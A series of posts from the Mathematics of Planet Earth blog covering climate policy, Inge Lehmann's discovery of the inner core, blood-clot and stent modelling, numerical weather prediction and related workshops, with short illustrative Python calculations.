What is MPE?

Mathematics of Planet Earth (MPE) is a grass-roots movement to enhance our understanding of the impact of human activities on Planet Earth by developing mathematical and computational models of physical phenomena and using data analytics to support science-based decision making. 

MPE activities fall into four broad categories:

  • Planet Earth as a physical system: climate dynamics, Earth’s oceans, atmosphere, biosphere, and cryosphere;
  • Planet Earth as a system supporting life: mathematical ecology, carbon cycle, food systems, natural resources, sustainability;
  • Planet Earth as a system organized by humans: land use, energy, communication, transportation, socio-economics;
  • Planet Earth as a system at risk: global change, biodiversity, water, food security, epidemics, extreme events.
Posted in General | Leave a comment

April 22, 2020 — 50 years of Earth Day

On April 22, 1970, Earth Day was born.  Twenty million Americans — 10% of the U.S. population at the time — took to the streets, college campuses and hundreds of cities to protest environmental ignorance and demand a new way forward for our planet. Earth Day was the unified response to an environment in crisis — oil spills, smog, rivers so polluted they literally caught fire. 

On April 22, 2020, we will celebrate the 50th anniversary of Earth Day. This time, our planet faces two global crises: the COVID-19 pandemic, which is immediate, and the climate crisis, which is slowly building.  Both will have enormous economic and social impact. Both are relevant to MPE.

The world was not prepared for a coronavirus. Leaders ignored hard science and delayed critical actions. The consequences are terrifying and deadly.  The climate crisis is no less real. It will be the most pressing issue for the next generations. Let us all support the movement for a cleaner, healthier planet.

Posted in General | Tagged | Leave a comment

Four reasons why the fight against climate change is likely to fail

[The following post by Steven Mufson appeared in “The Washington Post” Wonkblog, March 11, 2014]

Democrats in the Senate stayed up all night talking about the perils of climate change. But while there’s hope that technology, changing consumer and business practices or new policies could finally turn the tide and slow or reverse climate change, there are also good reasons to think those efforts will fail.

  • There isn’t enough research and development into ways of generating energy without emitting carbon dioxide. “The U.S. energy sector invests only 0.23 percent of its revenue in research and development, and federal R&D spending is only half of what it was in 1980,” says a new paper by non-profit centrist policy group Third Way.
  • The price of fossil fuels doesn’t include the cost of environmental damage and climate change. Legislation, meanwhile, isn’t doing the trick when it comes to increasing the price. A cap and trade program is complicated, virtually impossible politically, and not working all that well in Europe. A carbon tax – even a small gasoline tax – won’t get adopted by Congress.
  • Many countries still subsidize fossil fuels, including those in the Middle East where consumption is growing fastest. The International Monetary Fund puts the annual cost at $1.9 trillion (on a post-tax basis).
  • China is determined to increase living standards with more cars, more power plants, and more everything. In 2012, the average Chinese person emitted 6.2 metric tons of carbon dioxide a year, versus 17.6 metric tons for the average American. Closing even one-third of that gap (even with a more energy-efficient economy) will generate a lot more emissions; a rough sense of the scale is sketched just after this list.
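
A back-of-the-envelope calculation gives a sense of that scale. The sketch below is mine, not part of the original article, and the Chinese population figure is an assumed round number for 2012.

```python
# Rough scale of closing one-third of the per-capita emissions gap cited above.
# The population figure (~1.35 billion for China in 2012) is an assumption,
# not a number taken from the article.
china_per_capita = 6.2       # metric tons CO2 per person per year (2012)
us_per_capita = 17.6         # metric tons CO2 per person per year (2012)
china_population = 1.35e9    # assumed approximate 2012 population

gap = us_per_capita - china_per_capita            # 11.4 t per person
extra_per_person = gap / 3.0                      # closing one-third of the gap
extra_total = extra_per_person * china_population

print(f"extra emissions per person: {extra_per_person:.1f} t/yr")
print(f"extra emissions in total:   {extra_total / 1e9:.1f} billion t CO2/yr")
```

That works out to roughly 3.8 extra tons per person, or on the order of five billion tons of CO2 a year, comparable to total annual U.S. emissions.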

The Global Energy Initiative, a non-profit group devoted to promoting clean energy and slowing climate change, asked a handful of economists – liberal and conservative — for their views on what to do about climate change and the replies are somewhat gloomy.

Former top Obama economic policy adviser and former Harvard University president Larry Summers lists three items: eliminating energy subsidies, more funding for basic energy research, and carbon taxes. “As a practical matter my guess is the world will produce non-fossil-fuel power in the next 25 years at today’s fossil fuel prices or it will fail with respect to global climate change,” he says.

The iconoclastic Bjorn Lomborg, director of the Copenhagen Consensus Center and adjunct professor at Copenhagen Business School, says: “The only way to move towards a long-term reduction in emissions is if green energy becomes much cheaper.” He supports suggestions to increase research and development 10-fold to $100 billion a year globally.

Tyler Cowen, professor of economics at George Mason University, said: “The most likely scenario is that we will find out just how bad the climate change problem is slated to be.”

Posted in Climate Change | Tagged | Leave a comment

How Inge Lehmann discovered the inner core of the Earth

We cannot see the interior of the Earth, and yet we know much about it: there is a viscous mantle below the thin solid crust. The mantle, approximately 2900 km thick, surrounds the core. The core itself is divided into two parts, an outer core and an inner core. The inner core is ferrous and solid. How do we know all that? I like to tell my students that we put on our “mathematical glasses” to “see” what we cannot see with our eyes.

If the interior of the Earth is not homogeneous, then the speed of signals traveling inside the Earth varies from place to place. When large earthquakes occur, they generate strong seismic waves; these are detected and recorded by seismographs all around the world and provide raw data that can be analyzed further. Reconstructing the interior of the Earth from what is recorded at the surface is solving an “inverse problem”. When an earthquake occurs, a first inverse problem to solve is to locate the epicenter of the earthquake.

Earthquakes generate P-waves (pressure waves) and S-waves (shear waves).
S-waves are strongly damped when traveling in viscous media, and hence are not recorded far from the epicenter. This provides evidence for a liquid interior, as well as information on the thickness of the crust. By contrast, P-waves travel throughout the Earth and can be recorded very far from the epicenter.

Inge Lehmann was a Danish mathematician. She worked at the Danish Geodetic Institute, where she had access to the data recorded at seismic stations around the world. She discovered the inner core of the Earth in 1936. At the time, it was known that the mantle surrounded the core. Seismic waves travel at approximately 10 km/s in the mantle and 8 km/s in the core; hence, the waves are refracted when entering the core. This implies the existence of an annular region on the Earth’s surface, centered at the epicenter, where no seismic wave should be detected. But Inge Lehmann discovered that signals were recorded in the forbidden region. A piece of the puzzle was missing… She built a toy model (see figure) that could explain the observations and was later tested and adopted.

In this toy model she inserted an inner core in which the signals would travel at 8.8 km/s.
If you analyze the law of refraction, namely $\frac{\sin\theta_1}{v_1}= \frac{\sin\theta_2}{v_2}$, then the equation may have no solution for $\theta_2$ if $v_1$ is smaller than $v_2$ and $\theta_1$ is sufficiently large. This means that if a wave arrives on the slow side, sufficiently tangentially to the separating surface between the two media, then it cannot enter the second medium. It is then reflected at the separating surface. Hence, seismic waves can be reflected off the inner core. This is why they could be detected in the forbidden regions.
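
To make the refraction criterion concrete, here is a short Python sketch (my own illustration, not part of Lehmann’s analysis) that applies the law of refraction with the wave speeds quoted above and reports whether a wave meeting the faster inner core is refracted into it or totally reflected.

```python
import math

def refraction_angle(theta1_deg, v1, v2):
    """Apply sin(theta1)/v1 = sin(theta2)/v2.

    Returns the refraction angle theta2 in degrees, or None when
    sin(theta2) would exceed 1, i.e. the wave cannot enter the
    faster medium and is reflected at the separating surface.
    """
    s = math.sin(math.radians(theta1_deg)) * v2 / v1
    if s > 1.0:
        return None
    return math.degrees(math.asin(s))

# Speeds quoted in the post (km/s): about 8 in the core, 8.8 in the inner core.
v_core, v_inner = 8.0, 8.8

# Critical incidence angle beyond which waves are reflected, not refracted.
theta_c = math.degrees(math.asin(v_core / v_inner))
print(f"critical angle: about {theta_c:.1f} degrees")

for theta1 in (30, 60, 70, 80):
    theta2 = refraction_angle(theta1, v_core, v_inner)
    if theta2 is None:
        print(f"incidence {theta1} deg: totally reflected")
    else:
        print(f"incidence {theta1} deg: refracted at {theta2:.1f} deg")
```

Waves arriving more tangentially than the critical angle (about 65 degrees from the normal with these speeds) cannot enter the inner core and are reflected, and it is such reflected waves that show up in the forbidden region.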

The toy model appearing here was completed from a figure by Inge Lehmann and illustrates the reflected waves, drawn in black. Note that some refracted waves (in brown) also enter the forbidden regions.

Posted in Geophysics | Leave a comment

Moving toward a long-term collaboration around MPE

MPE2013 was launched at the winter meeting of the Canadian Mathematical Society in Montreal on December 7, 2012. At that time, approximately one hundred partners in several countries had planned a range of special scientific and outreach activities, which were to take place around the world in 2013 on the themes of “Mathematics of Planet Earth.” Subsequent launches at the national level brought in many new partners who developed their own MPE-related activities, particularly in the areas of outreach and curriculum development. In the course of the year, the enthusiasm kept growing, to the point that now, at the end of 2013, more than 140 partners are affiliated with MPE2013.

This level of cooperation of the world mathematical community has been without precedent. Of course, compared to what existed 20 years ago, technology makes it easier to collaborate across boundaries. But there is more to it: MPE2013 helped change the image of mathematics among students and the general public. Many activities sponsored by MPE2013 illustrated the role that mathematics plays not only in addressing the planetary challenges but also in discovering and understanding our planet, its interior dynamics and its movement in the solar system. Teachers have new material to provide exciting answers to the question: What is mathematics useful for? All this material is shared on the MPE website; it will be further enriched over the coming years and will be a lasting legacy of MPE2013—tangible evidence that collaboration is beneficial for our community.

The interest in MPE2013 within the research community has also been substantial. As research mathematicians, we are captivated by mathematical problems, and MPE2013 has demonstrated that planetary issues lead to many new and challenging problems. In the framework of MPE2013, we have organized summer schools for young researchers. Of course, a researcher cannot be trained in a few weeks, but what has been accomplished is really a first step toward what should be a long-term goal. This is true especially in view of the fact that the problems related to planet Earth are extremely complex; the ingredients are all interconnected and cannot be studied in isolation. As mathematicians, we have some experience building and analyzing models of complex systems, but we absolutely need to cooperate with other disciplines to capture the essence of the problems and improve our models so they are as faithful as possible to the real world, yet manageable in the context of mathematics. MPE2013 has exposed the immensity of the research field that needs to be explored.

“Mathematics of Planet Earth” needs to continue, and this is why MPE2013 will morph into MPE on January 1, 2014. MPE will maintain the momentum of multilevel collaborations (researchers and educators) within the world mathematical community. The foundation has been laid; MPE will take on the long-term task, including the training of new researchers and the support of collaborations with researchers in other scientific disciplines.

This contribution is the last official post of the MPE2013 Daily Blog. MPE will have its own blog, which will appear on a less regular basis. Please contact us when you want to report on new developments of MPE.

Hans Kaper and Christiane Rousseau

Posted in General | Leave a comment

Who ran the MPE2013 Daily Blogs during the last year?

During all of MPE2013 we could enjoy almost daily blog posts, in both French and English. Now that the year 2013 is coming to an end, we can look back and ask ourselves: who ran the blogs? None of us had realized at the beginning what a challenge this would represent. In the beginning it was relatively easy. We were writing the posts ourselves, and it was exciting to explain all those aspects of MPE that we were discovering and to learn about new topics in the posts that were written by others. After several months, it became more difficult: the obvious bloggers had contributed a fair number of posts, and if people were asked at the last minute, they would politely decline, leaving quite a few posts to be written by the members of the editorial committee.

For the English blog, we formed a team, and each member of the team took responsibility for providing posts one day a week. The team was chaired by Hans Kaper, who was also responsible for posting the blog entries. Except for short periods when he was traveling, Hans posted each entry: this included dealing with the formulas and images whenever there were any, and Hans would always take the time to do some copy-editing. We are extremely grateful to him for the fantastic job he accomplished, and I take the opportunity of this post today to thank him on behalf of the readers of our blog. Many thanks also to the other members of the editorial team: Estelle Basor, Brian Conrey, Jim Crowley, Bogdan Vernescu, and Kent Morrison, who also helped with the posting of the blogs.

I cannot mention the English blog without also mentioning the French blog. The title of this blog was “Un jour, une brève” (“Each day, a short note”), with a short “story” on Planet Earth every working day. The description was the following: The French blog aims at publishing one text a day (except on weekends) in connection with the themes of “Mathematics of Planet Earth”. These will be very short notices, say half a page each (in principle in French), without any technical details, which are intended to be read by a broad audience (that may include pre-university students). The goal is two-fold: we wish to explain on the one hand how mathematics can bring some useful information and on the other hand how mathematical activity is supplied with new problems, new questions raised by the surrounding world. They, too, brilliantly won their bet, with high-quality contributions and several thousand hits a day! Their posts will be published in a volume sometime next year. On behalf of MPE2013, we would like to thank their fantastic executive team: Martin Andler, Liliane Bel, Sylvie Benzoni, Thierry Goudon, Cyril Imbert, Pierre Pansu and Antoine Rousseau, who worked with an efficient editorial team.

Some countries also maintained blogs, at a somewhat lower frequency; we mention, for instance, the blog of MPE Australia. To all these countries we express our congratulations and thanks.

Christiane Rousseau

Posted in General | Leave a comment

A Thematic Semester on “Biodiversity and Evolution”

A thematic semester on “Biodiversity and Evolution” recently ended at the CRM (Centre de Recherches Mathématiques) in Montreal. It was packed with activities, drawing both mathematicians and biologists to a stimulating exchange of recent results, methodologies and open problems.

One of the challenges for a mathematician interested in this topic is the range of biological questions that are associated with this area. The concept of evolution—the change in inherited characteristics of populations over successive generations—affects every level of biological organization, from the molecular to organismal and species level. It is also associated with a variety of questions about how and why humans have evolved to what we are today (evolutionary neuroscience, physiology, psychology), as well as in our understanding of health and disease (evolutionary medicine). Since diversity of life on Earth is crucial to human well-being and sustainable development, evolution is also highly connected to the impacts of climate change. This goes to show the importance of fully comprehending fundamental evolutionary mechanisms.

The driving processes of evolution—mutation, genetic drift and natural selection—are, independently, relatively easy to understand. However, when combined they lead to different phenomena, and it is remarkably tricky to unravel the role of the different evolutionary causes from their signatures. At the molecular level, most of the complexity is due to exchanges of genetic material (recombination, gene duplication, gene swapping, etc.). At the organismal/ecological level the interactions between the species (food webs, predator-prey systems, specialists vs. generalists) or between individuals with different organizational/social roles (cooperators, defectors, etc.) lead to complex dynamics of population structures.

All of these issues were extensively discussed in the six workshops held at the CRM from August to December, 2013:
1) “Random Trees” focused on stochastic techniques for analyzing random tree structures;
2) “Mathematics for an Evolving Biodiversity” discussed probabilistic and statistical methodologies for drawing inferences from contemporary biodiversity;
3) “Mathematics of Sequence Evolution” presented computational approaches to investigation of function and structure of genetic sequences;
4) A minicourse on “Theoretical and Applied Tools in Population and Medical Genomics” gave an introduction to modern population genetics and genomics;
5) “Coalescent Theory” focused on the probabilistic techniques for reconstructing evolutionary relationships using a backwards in time approach; and
6) “Biodiversity and Environment — Viability and Dynamic Games Perspectives” combined biological, economical, social and interdisciplinary perspectives in mathematical modeling of individual or species interactions and their consequences for biodiversity and the environment.

A series of special lectures was given during the term by the Aisenstadt chairs David Aldous (UC Berkeley) and Martin Nowak (Harvard), as well as by the Clay senior scholar Bob Griffiths (Oxford). Abstracts and slides of the presentations can be found here.

What was apparent to anyone following all of the above workshops was the varied combination of approaches from distinct scientific disciplines: genomics, ecology, economics, computational biology, statistical genetics, and bioinformatics. Given the production and analysis of massive environmental, genetic and genomic data, it is clear that mathematical techniques are extremely useful in the advancement of these scientific areas. As randomness plays a prominent role in evolutionary processes, stochastic processes and random combinatorial objects are key players in its analysis and development. For young mathematicians interested in the area I would highly recommend a solid background in probability and stochastic processes, and some practice in simulating random processes.
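
As a small, self-contained illustration of the kind of random-process simulation mentioned above, the following Python sketch (my own, not taken from the semester’s material) draws the successive coalescence waiting times of Kingman’s coalescent for a sample of n lineages and compares the simulated tree height with its known expectation.

```python
import random

def kingman_waiting_times(n):
    """Simulate inter-coalescence times for n sampled lineages under
    Kingman's coalescent (time measured in coalescent units).

    While k lineages remain, the time to the next pairwise merger is
    exponentially distributed with rate k * (k - 1) / 2.
    """
    times = []
    k = n
    while k > 1:
        rate = k * (k - 1) / 2.0
        times.append(random.expovariate(rate))
        k -= 1
    return times

random.seed(1)
n = 10
heights = [sum(kingman_waiting_times(n)) for _ in range(10000)]
print("mean simulated tree height:   ", sum(heights) / len(heights))
print("theoretical value 2*(1 - 1/n):", 2 * (1 - 1 / n))
```

The same few lines extend readily to richer simulations, for instance by dropping mutations onto the branches or letting population size vary in time.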

Lea Popovic
Dept of Mathematics and Statistics
Concordia University

Posted in Biodiversity, Workshop Report | Leave a comment

Mathematical Modeling and Haemostasis

The study of blood and the mechanism of blood clotting can be traced back to about 400 BC and the father of medicine, Hippocrates. However, the first major advances came with the invention of the microscope and the beginning of its extensive use in research in the 17th century. From the late 19th century until today, many important breakthroughs have been made in research on haemostatic mechanisms, leading to an excellent understanding of each of the individual systems involved—the vascular system, blood cells, the coagulation pathways, and fibrinolysis. However, due to the complexity of these systems and their interactions, and the difficulty of in vivo experiments, many important questions are still open for further study.

Haemostasis results in the formation of a blood clot at the injury site, which stops the bleeding. The mechanism is based on a complex interaction between four different systems: the vascular system, blood cells, the coagulation pathways, and fibrinolysis. Malfunctions or changes in these systems can result in imbalance and lead to either bleeding or thrombotic disorders. Thrombosis is a life-threatening clot formation that can be caused by numerous diseases and conditions such as atherosclerosis, trauma, stroke, infarction, cancer, sepsis, surgery and many others. Thrombosis is the leading immediate cause of mortality and morbidity in modern society and a major cause of complications, and occasionally death, in people admitted to hospitals. The anticoagulant medications usually administered to such patients carry a serious risk of bleeding, with potentially fatal consequences. This explains the necessity of further studies of haemostasis.

During the last few decades mathematics has played an important role in the study and analysis of blood clotting in vitro and in vivo. Each of the systems involved has been extensively modeled and analyzed using mathematical tools. This has enabled the posing, evaluation and justification of biological hypotheses. First of all, the knowledge of fluid flows and hydrodynamics was used to model blood as a homogeneous viscous fluid, its flow in various vessel structures, and its non-Newtonian properties. These models are usually based on the Navier-Stokes equations. Furthermore, as the non-Newtonian properties of blood originate from the blood cells suspended in blood plasma, blood has also been modeled as a complex fluid in which individual cells are resolved. Such models allow the study of cellular interactions and of the behavior and distribution of cell populations in flow. In order to describe the complex structures and behavior of individual blood cells, many cell models have been developed and compared to experimentally observed characteristics and behavior, especially for erythrocytes. An example of such a model is given in [1].

The complex coagulation pathways, which involve more than 50 proteins and their interactions, have been extensively modeled and analyzed by systems of partial differential equations (PDEs). The systems describe the concentrations of proteins and their diffusion and reactions in vitro or in vivo (in flow). A few models have also been developed to describe and study the equally complex regulatory network of platelet interactions and the corresponding intracellular signalling.

Formation of a blood clot in vivo consists of two main processes – platelet aggregation and blood coagulation. The former results in the formation of a platelet aggregate, while the latter ends with fibrin polymerization and the formation of a fibrin net. The two processes influence each other and together enable blood clot formation. The flow velocity is reduced inside the platelet aggregate, which protects the protein concentrations from being washed away by the flow and thus enables the coagulation reactions to occur in its core. The fibrin net which forms inside the platelet aggregate reinforces the aggregate, allowing it to grow to the necessary size and to withstand the pressure from the flow.

The approaches to modeling blood clotting in flow can be divided into three main groups: continuous, discrete and hybrid models. The continuous models use mathematical analysis and systems of PDEs to describe both the coagulation reactions [2] and the flow. In these models, blood cells (platelets) are also modeled in terms of concentrations, while the clot can be described as a part of the fluid with significantly increased viscosity. Such models correctly describe flow properties and protein concentrations in the flow. However, they are unable to capture the mechanical properties and possible rupture of the clot, which originate from cell-cell interactions. The second approach is to model both the flow and individual cells by discrete methods. There are various discrete methods that can be used to model flow, ranging from purely simulation techniques to methods that are lattice discretizations of hydrodynamic equations. Although suitable for describing individual cells and their interactions, such methods often do not correctly model the concentrations of proteins and their diffusion in flow.
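
To give a flavour of the continuous approach, here is a minimal, illustrative Python sketch (not the model of [2]; the parameters are invented) that integrates a single Fisher-KPP-type reaction-diffusion equation for one protein concentration on a one-dimensional grid with an explicit finite-difference scheme. Full coagulation models couple dozens of such equations and add advection by the flow.

```python
import numpy as np

# One concentration c(x, t) obeying dc/dt = D * d^2c/dx^2 + k * c * (1 - c).
# Parameters are purely illustrative, not taken from the cited models.
D, k = 1e-3, 1.0            # diffusion coefficient, reaction rate
length, nx = 1.0, 101       # domain length, number of grid points
dx = length / (nx - 1)
dt = 0.4 * dx**2 / D        # below the explicit stability limit dx^2 / (2 D)

c = np.zeros(nx)
c[:5] = 1.0                 # activated concentration near the "injury site"

for _ in range(200):
    lap = np.zeros_like(c)
    lap[1:-1] = (c[2:] - 2.0 * c[1:-1] + c[:-2]) / dx**2
    c += dt * (D * lap + k * c * (1.0 - c))
    c[0], c[-1] = c[1], c[-2]    # zero-flux boundary conditions

# A concentration front propagates from the injury site into the domain.
print(np.round(c[::20], 3))
```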

Figure 1: A scheme of a clot obtained by model described in [3]. Reprinted with permission from [3].

The third group consists of hybrid models, which combine continuous and discrete methods in an attempt to use their individual strengths and give a more suitable description of a complex phenomenon such as blood clotting. Within hybrid models various combinations of methods are possible. An example is given in [3], where the flow of blood plasma and the platelets suspended in it is modeled with a discrete method, the Dissipative Particle Dynamics (DPD) method (the same as in [1]). The method is used to model fluid flows because it is able to correctly reproduce hydrodynamics. As the platelet aggregate demonstrates elastic properties, the interactions between platelets in the model, i.e., platelet adhesion, are described by Hooke’s law. A distinction is made between the weak GPIbα platelet connection and the stronger connection due to platelet activation. The continuous part of the model describes fibrin concentration and diffusion in flow. The model was used to study how the platelet aggregate influences and protects protein concentrations from the flow. Additionally, the model has shown a possible mechanism by which a platelet clot stops growing:

  • At the beginning of clot growth, platelets aggregate at the injury site due to weak connections (Figure 2, a). The injury site is modelled as several platelets attached to the vessel wall; they initiate clot growth. Since the flow velocity is sufficiently high, the concentration of fibrin remains low.
  • The platelet clot continues to grow due to weak connections and the flow speed inside it decreases. It makes it possible for the coagulation reaction to start, and fibrin concentration gradually increases (Figure 2, b).
  • This process continues until the clot becomes sufficiently large (Figures 2, c, d). Fibrin covers a part of the clot and strong platelet connections appear inside it.
  • Flow pressure exerts mechanical stresses on the clot and weak connections can rupture. In this case the clot breaks and its outer part is removed by the flow (Figure 2, e).
  • Its remaining part is covered by fibrin and thus it cannot attach new platelets. The final clot form is shown in (Figure 2, f).

Figure 2: Platelet clot growth obtained by model described in [3]. Flow is from left to right. Reprinted with permission from [3].

The model described in [3] investigates interactions between the platelet aggregate and the fibrin clot. However, its overly simplified description of the blood coagulation pathways results in a less realistic shape of the final clot. Nevertheless, its predictions are confirmed by a model with a more complete description of the blood coagulation pathways, which also produces a more realistic final clot shape (Figure 3).

Figure 3: Final clot obtained by a more complete model of blood coagulation. Blue area denotes fibrin polymer. Flow is from left to right.

The hybrid approaches show great potential for modelling complex phenomena. They are suitable for multiscale modelling, and it can be expected that in the near future they will offer new insights into many biological processes of great interest.

References:
[1] N. Bessonov, E. Babushkina, S.F. Golovashchenko, A. Tosenberger, F. Ataullakhanov, M. Panteleev, A. Tokarev, V. Volpert, Numerical Simulations of Blood Flows With Non-uniform Distribution of Erythrocytes and Platelets, Russian Journal of Numerical Analysis and Mathematical Modelling, 2013, Vol. 28, no. 5, 443-458.
[2] Y.V. Krasotkina, E.I. Sinauridze, F.I. Ataullakhanov, Spatiotemporal Dynamics of Fibrin Formation and Spreading of Active Thrombin Entering Non-recalcified Plasma by Diffusion, Biochimica et Biophysica Acta, 1474 (2000), 337-345.
[3] A. Tosenberger, F. Ataullakhanov, N. Bessonov, M. Panteleev, A. Tokarev, V. Volpert, Modelling of clot growth in flow with a DPD-PDE method, Journal of Theoretical Biology 337, 2013, pp. 30-41.

Alen Tosenberger
Institut Camille Jordan
Université Claude Bernard Lyon 1, France
tosenberger@math.univ-lyon1.fr
dracula.univ-lyon1.fr

Posted in Biology | Leave a comment

Numerical Weather Prediction – A Real-Life Application at the Intersection of Mathematics and Meteorology

In the daily operation of weather forecasts, powerful supercomputers are used to predict the weather by solving mathematical equations that model the atmosphere and oceans. In this process of numerical weather prediction (NWP), computers manipulate vast datasets collected from observations and perform extremely complex calculations to search for optimal solutions with a dimension as high as $10^8$. The idea of NWP was formulated as early as 1904, long before the invention of the modern computers that are needed to complete the vast number of calculations in the problem. In the 1920s, Lewis Fry Richardson used procedures originally developed by Vilhelm Bjerknes to produce by hand a six-hour forecast for the state of the atmosphere over two points in central Europe, taking at least six weeks to do so. In the late 1940s, a team of meteorologists and mathematicians led by John von Neumann and Jule Charney made significant progress toward more practical numerical weather forecasts. By the mid-1950s, numerical forecasts were being made on a regular basis (earthobservatory.nasa.gov and Wikipedia.org).

Several areas of mathematics play fundamental roles in NWP, including mathematical models and their associated numerical algorithms, computational nonlinear optimization in very high dimensions, the manipulation of huge datasets, and parallel computation. Even after decades of active research with the increasing power of supercomputers, the forecast skill of numerical weather models extends only to about six days. Improving current models and developing new models for NWP has always been an active area of research. Operational weather and climate models are based on the Navier-Stokes equations coupled with various interactive Earth components such as the ocean, land terrain, and water cycles. Many models use a latitude–longitude spherical grid. Its logically rectangular structure, orthogonality, and symmetry properties make it relatively straightforward to obtain various desirable, accuracy-related properties. On the other hand, the rapid development of massively parallel computation platforms constantly renews the impetus to investigate better mathematical models using traditional or alternative spherical grids. Interested readers are referred to a recent survey paper in the Quarterly Journal of the Royal Meteorological Society (Vol. 138: 1-26).

Initial conditions must be generated before one can compute a solution for weather prediction. The process of entering observation data into the model to generate initial conditions is called data assimilation. Its goal is to find an estimate of the true state of the weather based on observations (e.g., sensor data) and prior knowledge (e.g., mathematical models, system uncertainties, and sensor noise). A family of variational methods called 4D-Var is widely used in NWP for data assimilation. In this approach, a cost function based on initial and sensor error covariances is minimized to find the solution of a numerical forecast model that best fits a series of observational datasets distributed in space over a finite time interval. Another family of data assimilation methods is ensemble Kalman filters. They are reduced-rank Kalman filters based on sample error covariance matrices, an approach that avoids the integration of a full-size covariance matrix, which is impossible even for today’s most powerful supercomputers. In contrast to the interpolation methods used in the early days, 4D-Var and ensemble Kalman filters are iterative methods that can be applied to much larger problems. Yet the effort of solving problems of even larger size is far from over. Current day-to-day forecasting uses global models with grid resolutions between 16 and 50 km, and about 2 to 20 km for short-period local forecasting. Developing efficient and accurate data assimilation algorithms for higher-resolution models is a long-term challenge that will face mathematicians and meteorologists for many years to come.
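
As a toy illustration of the ensemble Kalman filter idea, the following Python sketch performs a single stochastic (perturbed-observation) analysis step on a small, made-up state. It is my own simplified example, not an operational scheme; in particular, it forms the sample covariance explicitly, which real reduced-rank implementations avoid, and it observes the whole state, whereas real systems observe only part of it and rely on covariance localization to control sampling noise.

```python
import numpy as np

def enkf_analysis(X, y, H, R, rng):
    """One stochastic (perturbed-observation) ensemble Kalman filter step.

    X : (n, m) forecast ensemble (m members of an n-dimensional state)
    y : (p,)   observation vector
    H : (p, n) linear observation operator
    R : (p, p) observation-error covariance
    Returns the analysis ensemble, shape (n, m).
    """
    m = X.shape[1]
    A = X - X.mean(axis=1, keepdims=True)             # ensemble anomalies
    Pf = A @ A.T / (m - 1)                            # sample forecast covariance
    K = Pf @ H.T @ np.linalg.inv(H @ Pf @ H.T + R)    # Kalman gain
    # Perturb the observations so the analysis ensemble keeps a consistent spread.
    Y = y[:, None] + rng.multivariate_normal(np.zeros(len(y)), R, m).T
    return X + K @ (Y - H @ X)

rng = np.random.default_rng(0)
n, m = 40, 200                        # toy sizes, far below the 10^8 of real NWP
truth = np.sin(np.linspace(0.0, 2.0 * np.pi, n))

# Background state with errors of standard deviation 0.5, and an ensemble whose
# spread matches that error so the sample covariance is a fair uncertainty estimate.
x_b = truth + rng.normal(0.0, 0.5, n)
X = x_b[:, None] + rng.normal(0.0, 0.5, (n, m))

H = np.eye(n)                         # every state variable observed (a simplification)
R = 0.1 * np.eye(n)
y = H @ truth + rng.multivariate_normal(np.zeros(n), R)

Xa = enkf_analysis(X, y, H, R, rng)
print("background RMSE:", np.sqrt(np.mean((X.mean(axis=1) - truth) ** 2)))
print("analysis RMSE:  ", np.sqrt(np.mean((Xa.mean(axis=1) - truth) ** 2)))
```

Pulling the ensemble toward the observations reduces the error of the ensemble mean; a 4D-Var scheme would instead minimize a cost function measuring the misfit to the same observations over a time window.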

Wei Kang
Naval Postgraduate School
Monterey, California

Posted in Mathematics, Weather | Leave a comment

Predictive Models for the Ecological Risk Assessment of Chemicals

Ecological risk assessment (ERA) is an area of national and international concern, and is increasingly being driven by the need for a mathematical underpinning that addresses relevant biological complexities at numerous scales.

A major challenge in assessing the impacts of toxic chemicals on ecological systems is the development of predictive linkages between chemically-caused alterations at molecular and biochemical levels of organization and adverse outcomes on ecological systems.

In April, the National Institute for Mathematical and Biological Synthesis (NIMBioS) will host an Investigative Workshop on “Predictive Models for ERA.” The workshop will bring together a multidisciplinary group of molecular and cell biologists, physiologists, ecologists, mathematicians, computational biologists, and statisticians to explore the challenges and opportunities for developing and implementing models that are specifically designed to mechanistically link between levels of biological organization in a way that can inform ecological risk assessment and ultimately environmental policy and management. The focus will be on predictive systems models in which properties at higher levels of organization emerge from the dynamics of processes occurring at lower levels of organization.

Specific goals are to (1) identify advantages and limitations of various predictive systems models to connect chemically caused changes in organismic and suborganismic processes with outcomes at higher levels of organization that are relevant for environmental management; (2) identify the criteria that models of this kind have to fulfill in order to be useful for informing ecological risk assessment and management; and (3) propose a series of recommendations for further action.

Co-organizing the workshop are Valery Forbes, professor and director of the School of Biological Sciences at the University of Nebraska-Lincoln, and Richard Rebarber, professor of mathematics, also at UNL.

If you have an interest in these topics, the workshop is still accepting applications. The application deadline is Jan. 20, 2014. Individuals with a strong interest in the topic, including post-docs and graduate students, are encouraged to apply. Click here for more information and on-line registration.

NIMBioS Investigative Workshops focus on broad topics or a set of related topics, summarizing/synthesizing the state of the art and identifying future directions. Organizers and key invited researchers make up approximately one half of the 30-40 participants in a workshop; the remaining 15-20 places are filled through open application from the scientific community. If needed, NIMBioS can provide support (travel, meals, lodging) for workshop attendees.

Posted in Ecology, Risk Analysis, Workshop Announcement | Leave a comment

Mathematical Models Enhance Current Therapies for Coronary Heart Disease

Equations help explain key parameters of stents that combat atherosclerosis

Coronary heart disease accounts for 18% of deaths in the United States every year. The disease results from a blockage of one or more arteries that supply blood to the heart muscle. This occurs as a result of a complex inflammatory condition called atherosclerosis, which leads to progressive buildup of fatty plaque near the surface of the arterial wall.

In a paper published last month in the SIAM Journal on Applied Mathematics, authors Sean McGinty, Sean McKee, Roger Wadsworth, and Christopher McCormick devise a mathematical model to improve currently-employed treatments of coronary heart disease (CHD).

“CHD remains the leading global cause of death, and mathematical modeling has a crucial role to play in the development of practical and effective treatments for this disease,” says lead author Sean McGinty. “The use of mathematics allows often highly complex biological processes and treatment responses to be simplified and written in terms of equations which describe the key parameters of the system. The solution of these equations invariably provides invaluable insight and understanding that will be crucial to the development of better treatments for patients in the future.”

The accumulation of plaque during CHD can result in chest pain and, ultimately, rupture of the atherosclerotic plaque, which causes blood clots that block the artery and lead to heart attacks. A common method of treatment involves inserting a small metallic cage called a stent into the occluded artery to maintain blood flow.

Figure: Cross-section of a coronary artery with plaque buildup. ‘A’ shows the inserted deflated balloon catheter; the balloon is inflated in ‘B’; ‘C’ shows the widened artery. Image source: National Heart, Lung, and Blood Institute; National Institutes of Health; U.S. Department of Health and Human Services.

However, upon insertion of a stent, the endothelium—the thin layer of cells that lines the inner surface of the artery—can be severely damaged. The inflammatory response triggered by this damage leads to excessive proliferation and migration of smooth muscle cells (cells in the arterial wall involved in both normal physiology and disease), leading to re-blocking of the artery. This is an important limitation in the use of stents. One way to combat this has been the use of stents that release drugs to inhibit the smooth muscle cell proliferation that causes the occlusion. However, these drug-eluting stents have been associated with incomplete healing of the artery. Studies are now being conducted to improve their performance.

